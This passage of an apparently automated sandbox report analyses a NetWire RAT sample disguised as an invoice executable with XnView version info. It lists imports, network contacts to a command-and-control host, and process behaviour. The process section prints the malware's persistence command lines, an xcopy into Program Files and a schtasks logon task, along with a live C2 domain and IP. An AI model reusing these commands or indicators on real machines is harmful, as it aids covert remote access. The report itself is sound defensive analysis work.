GDI32.dll	GetTextFaceA, GetTextExtentPoint32W, GetTextExtentPointA, GetTextAlign, GetStretchBltMode, GetPolyFillMode, GetNearestColor, GetBkMode, GetROP2, SetAbortProc, AbortDoc, EndPage, StartPage, EndDoc, DeleteMetaFile, CreateMetaFileA, CloseMetaFile, GetViewportOrgEx, GetWindowOrgEx, SetPixelV, SetPaletteEntries, ExtFloodFill, PtInRegion, GetBoundsRect, FrameRgn, FillRgn, RoundRect, GetCurrentObject, OffsetRgn, GetRgnBox, Rectangle, StretchDIBits, GetCharWidthA, CreateFontA, EnumFontFamiliesExA, LPtoDP, CreateRoundRectRgn, Polyline, Polygon, CreatePolygonRgn, GetTextColor, Ellipse, CreateEllipticRgn, SetDIBColorTable, CreateDIBSection, StretchBlt, SetPixel, GetDIBits, GetTextCharsetInfo, EnumFontFamiliesA, CreateDIBitmap, GetBkColor, RealizePalette, GetSystemPaletteEntries, GetPaletteEntries, GetNearestPaletteIndex, CreatePalette, CreateCompatibleBitmap, GetTextMetricsA, DPtoLP, SetRectRgn, GetMapMode, CombineRgn, GetTextExtentPoint32A, CreateFontIndirectA, ScaleWindowExtEx, ScaleViewportExtEx, OffsetWindowOrgEx, OffsetViewportOrgEx, SetWindowOrgEx, SetWindowExtEx, SetViewportOrgEx, SetViewportExtEx, PolylineTo, PolyBezierTo, ExtTextOutA, TextOutA, MoveToEx, GetObjectA, ExtCreatePen, SetArcDirection, SelectClipPath, PolyDraw, ArcTo, StartDocA, SetColorAdjustment, ModifyWorldTransform, SetWorldTransform, EnumMetaFile, PlayMetaFileRecord, SetTextJustification, SetTextAlign, SetTextColor, SetTextCharacterExtra, SetStretchBltMode, SetROP2, SetPolyFillMode, GetLayout, SetLayout, SetMapMode, SetGraphicsMode, SetMapperFlags, SetBkMode, SetBkColor, SelectPalette, SelectObject, ExtSelectClipRgn, SelectClipRgn, SaveDC, RestoreDC, RectVisible, PtVisible, PlayMetaFile, OffsetClipRgn, LineTo, IntersectClipRect, GetWindowExtEx, GetViewportExtEx, GetStockObject, GetPixel, GetObjectType, GetCurrentPositionEx, GetClipRgn, GetClipBox, ExcludeClipRect, Escape, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePatternBrush, CreatePen, CreateHatchBrush, CreateDIBPatternBrushPt, CreateCompatibleDC, BitBlt, CreateBitmap, PatBlt, CreateRectRgnIndirect, GetDeviceCaps, CreateDCA, CopyMetaFileA
MSIMG32.dll	TransparentBlt, AlphaBlend
WINSPOOL.DRV	OpenPrinterA, DocumentPropertiesA, ClosePrinter, GetJobA
ADVAPI32.dll	RegSetValueA, RegOpenKeyExA, RegQueryValueExA, GetFileSecurityA, SetFileSecurityA, RegEnumKeyExA, RegOpenKeyExW, RegEnumValueA, RegQueryValueA, RegEnumKeyA, RegSetValueExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegCloseKey
SHELL32.dll	DragFinish, DragQueryFileA, SHGetDesktopFolder, SHBrowseForFolderA, ShellExecuteA, SHGetPathFromIDListA, SHGetFileInfoA, ExtractIconA, SHAddToRecentDocs, SHAppBarMessage, SHGetSpecialFolderLocation, SHGetMalloc, ShellExecuteExA
COMCTL32.dll	ImageList_ReplaceIcon
SHLWAPI.dll	PathStripToRootA, PathIsUNCA, PathRemoveExtensionA, PathFindFileNameA, PathFindExtensionA, StrFormatKBSizeA, PathRemoveFileSpecW
UxTheme.dll	GetThemeSysColor, GetWindowTheme, IsAppThemed, GetThemePartSize, IsThemeBackgroundPartiallyTransparent, DrawThemeText, DrawThemeParentBackground, OpenThemeData, CloseThemeData, DrawThemeBackground, GetThemeColor, GetCurrentThemeName
ole32.dll	CoLockObjectExternal, OleGetClipboard, DoDragDrop, OleIsCurrentClipboard, OleQueryCreateFromData, CoFreeUnusedLibraries, RevokeDragDrop, PropVariantCopy, OleSetMenuDescriptor, OleLockRunning, StgCreateDocfile, StgOpenStorage, StgOpenStorageOnILockBytes, StgIsStorageFile, CreateILockBytesOnHGlobal, CreateFileMoniker, OleCreateMenuDescriptor, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, OleRegGetMiscStatus, OleRegEnumVerbs, StgCreateDocfileOnILockBytes, WriteClassStm, GetHGlobalFromILockBytes, CreateGenericComposite, CreateItemMoniker, OleCreate, OleCreateFromData, OleCreateLinkFromData, OleCreateStaticFromData, RegisterDragDrop, OleFlushClipboard, OleSetClipboard, CreateStreamOnHGlobal, CoInitializeEx, CoDisconnectObject, StringFromGUID2, CoCreateGuid, OleRun, OleCreateLinkToFile, OleCreateFromFile, CLSIDFromProgID, CLSIDFromString, SetConvertStg, OleRegGetUserType, ReleaseStgMedium, OleDuplicateData, ReadFmtUserTypeStg, WriteFmtUserTypeStg, CreateBindCtx, CoTreatAsClass, WriteClassStg, ReadClassStg, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID, CoInitialize, CoCreateInstance, CoUninitialize, OleLoad, OleSave, OleSaveToStream, OleSetContainedObject, OleGetIconOfClass, CreateDataAdviseHolder, CreateOleAdviseHolder, GetRunningObjectTable, OleIsRunning, CoGetMalloc, OleInitialize, CoRegisterMessageFilter, CoRevokeClassObject, CoRegisterClassObject, CoGetClassObject, OleUninitialize, OleQueryLinkFromData
OLEAUT32.dll	SysAllocString, SysStringLen, VariantChangeType, SysAllocStringLen, SysReAllocStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayAllocDescriptor, SafeArrayAllocData, SafeArrayCreate, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayDestroy, SafeArrayRedim, SafeArrayGetDim, SafeArrayGetElemsize, SysAllocStringByteLen, SafeArrayUnlock, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayPutElement, SafeArrayCopy, SafeArrayPtrOfIndex, VariantCopy, VarDateFromStr, VarCyFromStr, VarBstrFromCy, VarBstrFromDate, VarBstrFromDec, VarDecFromStr, LoadTypeLib, LoadRegTypeLib, RegisterTypeLib, SafeArrayGetUBound, SysStringByteLen, VariantClear, VariantInit, SafeArrayGetLBound, SafeArrayGetElement, SafeArrayLock, SysFreeString
oledlg.dll
gdiplus.dll	GdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdipCreateBitmapFromHBITMAP, GdipDrawImageI, GdipDeleteGraphics, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromFileICM, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromFile, GdipCreateBitmapFromStream, GdipGetImagePaletteSize, GdipGetImagePalette, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipGetImageGraphicsContext, GdipDisposeImage, GdipCloneImage, GdiplusStartup, GdipFree, GdipAlloc, GdiplusShutdown
OLEACC.dll	AccessibleObjectFromWindow, LresultFromObject, CreateStdAccessibleObject
IMM32.dll	ImmReleaseContext, ImmGetOpenStatus, ImmGetContext
WINMM.dll	PlaySoundA

Version Infos

Description	Data
LegalCopyright	Copyright 2008-2021 XnView
InternalName	XnView MP
FileVersion	0.99.1.0
CompanyName	XnView, http://www.xnview.com
ProductName	XnView MP Application
ProductVersion	0.99.1.0
FileDescription	XnView MP
OriginalFilename	xnviewmp.exe
Translation	0x040c 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2021 14:34:01.705142021 CET	49777	3360	192.168.2.6	51.195.57.233
Nov 17, 2021 14:34:01.734396935 CET	3360	49777	51.195.57.233	192.168.2.6
Nov 17, 2021 14:34:01.734606028 CET	49777	3360	192.168.2.6	51.195.57.233
Nov 17, 2021 14:34:01.735004902 CET	49777	3360	192.168.2.6	51.195.57.233
Nov 17, 2021 14:34:01.822124004 CET	3360	49777	51.195.57.233	192.168.2.6
Nov 17, 2021 14:34:01.837641954 CET	49777	3360	192.168.2.6	51.195.57.233
Nov 17, 2021 14:34:01.960125923 CET	3360	49777	51.195.57.233	192.168.2.6
Nov 17, 2021 14:34:33.478473902 CET	3360	49777	51.195.57.233	192.168.2.6
Nov 17, 2021 14:34:33.481177092 CET	49777	3360	192.168.2.6	51.195.57.233
Nov 17, 2021 14:34:33.576091051 CET	3360	49777	51.195.57.233	192.168.2.6
Nov 17, 2021 14:35:33.778160095 CET	3360	49777	51.195.57.233	192.168.2.6
Nov 17, 2021 14:35:33.778877974 CET	49777	3360	192.168.2.6	51.195.57.233
Nov 17, 2021 14:35:33.874748945 CET	3360	49777	51.195.57.233	192.168.2.6
Nov 17, 2021 14:36:34.102082968 CET	3360	49777	51.195.57.233	192.168.2.6
Nov 17, 2021 14:36:34.102746964 CET	49777	3360	192.168.2.6	51.195.57.233
Nov 17, 2021 14:36:34.195188046 CET	3360	49777	51.195.57.233	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2021 14:34:01.496373892 CET	55299	53	192.168.2.6	8.8.8.8
Nov 17, 2021 14:34:01.583832026 CET	53	55299	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 17, 2021 14:34:01.496373892 CET	192.168.2.6	8.8.8.8	0xa048	Standard query (0)	calibare5454.pro	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 17, 2021 14:34:01.583832026 CET	8.8.8.8	192.168.2.6	0xa048	No error (0)	calibare5454.pro		51.195.57.233	A (IP address)	IN (0x0001)
Nov 17, 2021 14:37:19.377098083 CET	8.8.8.8	192.168.2.6	0xdb66	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: important invoice presentation nov 2021.exe PID: 6968 Parent PID: 4240

General

Start time:	14:32:39
Start date:	17/11/2021
Path:	C:\Users\user\Desktop\important invoice presentation nov 2021.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\important invoice presentation nov 2021.exe"
Imagebase:	0x1250000
File size:	3391296 bytes
MD5 hash:	1364844E0BFB349272C5050FB0E677E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 00000001.00000002.507835553.000000001C8F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3576 Parent PID: 6968

General

Start time:	14:33:44
Start date:	17/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5272 Parent PID: 3576

General

Start time:	14:33:45
Start date:	17/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: xcopy.exe PID: 6100 Parent PID: 3576

General

Start time:	14:33:46
Start date:	17/11/2021
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "C:\Program Files (x86)\Security\" /y /i /c /q
Imagebase:	0x12c0000
File size:	44544 bytes
MD5 hash:	9F3712DDC0D7FE3D75B8A06C6EE8E68C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5536 Parent PID: 6968

General

Start time:	14:33:49
Start date:	17/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks /create /sc ONLOGON /tn "Security" /tr "%ProgramFiles%\Security\important invoice presentation nov 2021.exe" /it /f
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3168 Parent PID: 5536

General

Start time:	14:33:50
Start date:	17/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 5660 Parent PID: 5536

General

Start time:	14:33:50
Start date:	17/11/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f
Imagebase:	0xa10000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: important invoice presentation nov 2021.exe PID: 2872 Parent PID: 936

General

Start time:	14:33:51
Start date:	17/11/2021
Path:	C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe
Imagebase:	0xb90000
File size:	3391296 bytes
MD5 hash:	1364844E0BFB349272C5050FB0E677E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000000D.00000002.683551594.000000001CF00000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: xwizard.exe PID: 5612 Parent PID: 6968

General

Start time:	14:33:51
Start date:	17/11/2021
Path:	C:\Windows\SysWOW64\xwizard.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\xwizard.exe
Imagebase:	0x11e0000
File size:	55808 bytes
MD5 hash:	17059CA3DDD41B52DE4140705B38AE53
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 5704 Parent PID: 2872

General

Start time:	14:35:08
Start date:	17/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c xcopy "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3132 Parent PID: 5704

General

Start time:	14:35:09
Start date:	17/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: xcopy.exe PID: 4920 Parent PID: 5704

General

Start time:	14:35:10
Start date:	17/11/2021
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" "C:\Program Files (x86)\Security\" /y /i /c /q
Imagebase:	0x7ff7e33a0000
File size:	44544 bytes
MD5 hash:	9F3712DDC0D7FE3D75B8A06C6EE8E68C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3032 Parent PID: 2872

General

Start time:	14:35:11
Start date:	17/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks /create /sc ONLOGON /tn "Security" /tr "%ProgramFiles%\Security\important invoice presentation nov 2021.exe" /it /f
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4388 Parent PID: 3032

General

Start time:	14:35:12
Start date:	17/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 2032 Parent PID: 3032

General

Start time:	14:35:12
Start date:	17/11/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f
Imagebase:	0xa10000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: xwizard.exe PID: 2040 Parent PID: 2872

General

Start time:	14:35:13
Start date:	17/11/2021
Path:	C:\Windows\SysWOW64\xwizard.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\xwizard.exe
Imagebase:	0x11e0000
File size:	55808 bytes
MD5 hash:	17059CA3DDD41B52DE4140705B38AE53
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp, Author: Joe Security Rule: netwire, Description: detect netwire in memory, Source: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: important invoice presentation nov 2021.exe PID: 2872 Parent PID: 936 important invoice presentation nov 2021.exeCOMMON

Executed Functions

Function 00C010FC, Relevance: 68.6, APIs: 34, Strings: 5, Instructions: 366stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C01106

Part of subcall function 00BB274F: __EH_prolog3.LIBCMT ref: 00BB2756
Part of subcall function 00BB274F: GetWindowDC.USER32(00000000,00000004,00C01693,00000000), ref: 00BB2782

GetDeviceCaps.GDI32(?,00000058), ref: 00C01126
DeleteObject.GDI32(00000000), ref: 00C01190
DeleteObject.GDI32(00000000), ref: 00C011AE
DeleteObject.GDI32(00000000), ref: 00C011CC
DeleteObject.GDI32(00000000), ref: 00C011EA
DeleteObject.GDI32(00000000), ref: 00C01208
DeleteObject.GDI32(00000000), ref: 00C01226
DeleteObject.GDI32(00000000), ref: 00C01244
DeleteObject.GDI32(00000000), ref: 00C01262
DeleteObject.GDI32(00000000), ref: 00C01280
DeleteObject.GDI32(00000000), ref: 00C0129E
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 00C012D6
lstrcpyA.KERNEL32(?,?), ref: 00C01326
EnumFontFamiliesA.GDI32(?,00000000,00C00AFC,Segoe UI), ref: 00C0134D
lstrcpyA.KERNEL32(?,Segoe UI), ref: 00C01360
EnumFontFamiliesA.GDI32(?,00000000,00C00AFC,Tahoma), ref: 00C0137E
lstrcpyA.KERNEL32(?,MS Sans Serif), ref: 00C01398
CreateFontIndirectA.GDI32(?), ref: 00C013A2
CreateFontIndirectA.GDI32(?), ref: 00C013F3
CreateFontIndirectA.GDI32(?), ref: 00C01432
CreateFontIndirectA.GDI32(?), ref: 00C0145E
CreateFontIndirectA.GDI32(?), ref: 00C0147F
GetSystemMetrics.USER32 ref: 00C0149E
lstrcpyA.KERNEL32(?,Marlett), ref: 00C014B1
CreateFontIndirectA.GDI32(?), ref: 00C014BB
GetStockObject.GDI32(00000011), ref: 00C014E7
GetObjectA.GDI32(00000000,0000003C,?), ref: 00C01502
lstrcpyA.KERNEL32(?,Arial,?,?,00000000), ref: 00C01543
CreateFontIndirectA.GDI32(?), ref: 00C0154D
CreateFontIndirectA.GDI32(?), ref: 00C01566
GetObjectA.GDI32(00000000,0000003C,?), ref: 00C01584
CreateFontIndirectA.GDI32(?), ref: 00C01592
CreateFontIndirectA.GDI32(?), ref: 00C015B3

Part of subcall function 00C01A4B: __EH_prolog3_GS.LIBCMT ref: 00C01A52
Part of subcall function 00C01A4B: GetTextMetricsA.GDI32(?,?), ref: 00C01A87
Part of subcall function 00C01A4B: GetTextMetricsA.GDI32(?,?), ref: 00C01AC8

Strings

Marlett, xrefs: 00C014AB
Tahoma, xrefs: 00C0136C, 00C0138B
Segoe UI, xrefs: 00C0133B, 00C01357
Arial, xrefs: 00C01533
MS Sans Serif, xrefs: 00C01392

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_$CapsCharsetDeviceH_prolog3InfoStockSystemWindow
String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
API String ID: 2837096512-1395034203
Opcode ID: 817f97befbce1725df647d7f2772804b989ed7f10bcd9047c871c6d36389de15
Instruction ID: 83f30b5f379d92c947d644e823ea7e18aa14baae6a3f40cb7647f8334fb14f9b
Opcode Fuzzy Hash: 817f97befbce1725df647d7f2772804b989ed7f10bcd9047c871c6d36389de15
Instruction Fuzzy Hash: B7E18E70900309DFDF259BA4DD49BEEBBF8AF04701F0485A9E55AE3291DB749A44CF21

Uniqueness

Uniqueness Score: -1.00%

Function 00C0162D, Relevance: 64.8, APIs: 43, Instructions: 298COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C01634
GetSysColor.USER32(00000016), ref: 00C0163D
GetSysColor.USER32(0000000F), ref: 00C01650
GetSysColor.USER32(00000015), ref: 00C01667
GetSysColor.USER32(0000000F), ref: 00C01673
GetDeviceCaps.GDI32(?,0000000C), ref: 00C0169B
GetSysColor.USER32(0000000F), ref: 00C016A9
GetSysColor.USER32(00000010), ref: 00C016B7
GetSysColor.USER32(00000015), ref: 00C016C5
GetSysColor.USER32(00000016), ref: 00C016D3
GetSysColor.USER32(00000014), ref: 00C016E1
GetSysColor.USER32(00000012), ref: 00C016EF
GetSysColor.USER32(00000011), ref: 00C016FD
GetSysColor.USER32(00000006), ref: 00C01708
GetSysColor.USER32(0000000D), ref: 00C01713
GetSysColor.USER32(0000000E), ref: 00C0171E
GetSysColor.USER32(00000005), ref: 00C01729
GetSysColor.USER32(00000008), ref: 00C01737
GetSysColor.USER32(00000009), ref: 00C01742
GetSysColor.USER32(00000007), ref: 00C0174D
GetSysColor.USER32(00000002), ref: 00C01758
GetSysColor.USER32(00000003), ref: 00C01763
GetSysColor.USER32(0000001B), ref: 00C01771
GetSysColor.USER32(0000001C), ref: 00C0177F
GetSysColor.USER32(0000000A), ref: 00C0178D
GetSysColor.USER32(0000000B), ref: 00C0179B
GetSysColor.USER32(00000013), ref: 00C017A9
GetSysColor.USER32(0000001A), ref: 00C017D2
GetSysColorBrush.USER32(00000010), ref: 00C017E3
GetSysColorBrush.USER32(00000014), ref: 00C017F6
GetSysColorBrush.USER32(00000005), ref: 00C01809
CreateSolidBrush.GDI32(?), ref: 00C0182A
CreateSolidBrush.GDI32(00000010), ref: 00C01848
CreateSolidBrush.GDI32(?), ref: 00C01866
CreateSolidBrush.GDI32(?), ref: 00C01887
CreateSolidBrush.GDI32(?), ref: 00C018A5
CreateSolidBrush.GDI32(?), ref: 00C018C3
CreateSolidBrush.GDI32(?), ref: 00C018E1
CreatePen.GDI32(00000000,00000001,00000000), ref: 00C01907
CreatePen.GDI32(00000000,00000001,00000000), ref: 00C0192B
CreatePen.GDI32(00000000,00000001,00000000), ref: 00C0194F
CreateSolidBrush.GDI32(?), ref: 00C019CD
CreatePatternBrush.GDI32(00000000), ref: 00C01A0B

Part of subcall function 00BB3BD5: DeleteObject.GDI32(00000000), ref: 00BB3BE4

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
String ID:
API String ID: 3754413814-0
Opcode ID: e61c26d92f4241c418bc0fcda19f2772e38513d2423d5d3cfcba0295e582b442
Instruction ID: 59ad4bdb7e9924bd2921f80cbe385f30113e0b5fecd9bfda03c48d3ad47e1ad8
Opcode Fuzzy Hash: e61c26d92f4241c418bc0fcda19f2772e38513d2423d5d3cfcba0295e582b442
Instruction Fuzzy Hash: 22C16D74A00B06EFCB05AFB48C197F8BFE0BF44701F044619E65AD7691DBB4A621DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2814, Relevance: 18.1, APIs: 12, Instructions: 138memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00E47F04), ref: 00BC2829
GlobalAlloc.KERNELBASE(00000002,00000000), ref: 00BC2881
GlobalHandle.KERNEL32(00E47EF8), ref: 00BC288B
GlobalUnlock.KERNEL32(00000000), ref: 00BC2894
GlobalReAlloc.KERNEL32 ref: 00BC28AE
GlobalLock.KERNEL32 ref: 00BC28B9
LeaveCriticalSection.KERNEL32(0000001C), ref: 00BC2903
GlobalHandle.KERNEL32(00E47EF8), ref: 00BC2917
GlobalLock.KERNEL32 ref: 00BC291E
LeaveCriticalSection.KERNEL32(?), ref: 00BC2928
EnterCriticalSection.KERNEL32(?,00000001,00000000), ref: 00BC293F
LeaveCriticalSection.KERNEL32(?), ref: 00BC296B

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Global$CriticalSection$Leave$AllocEnterHandleLock$Unlock
String ID:
API String ID: 2233717024-0
Opcode ID: 0c48a35ec9c5af1e53142ddd8c2d25b1185f4f4c6edec535729d0b109508e5be
Instruction ID: c070cb67dba490f11b9e85b7958a2311cb365a6786d591e9d570fdd79ffe90f8
Opcode Fuzzy Hash: 0c48a35ec9c5af1e53142ddd8c2d25b1185f4f4c6edec535729d0b109508e5be
Instruction Fuzzy Hash: F4419D35600304EFDB249F68D889FAA7BF8EF44705F0485AEE842D7391DBB0A941CB61

Uniqueness

